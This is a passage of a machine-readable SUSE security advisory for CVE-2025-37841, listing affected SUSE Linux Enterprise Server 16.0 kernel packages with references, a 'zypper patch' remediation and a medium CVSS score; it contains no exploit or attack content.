"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37841",
"url": "https://www.suse.com/security/cve/CVE-2025-37841"
},
{
"category": "external",
"summary": "SUSE Bug 1242974 for CVE-2025-37841",
"url": "https://bugzilla.suse.com/1242974"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
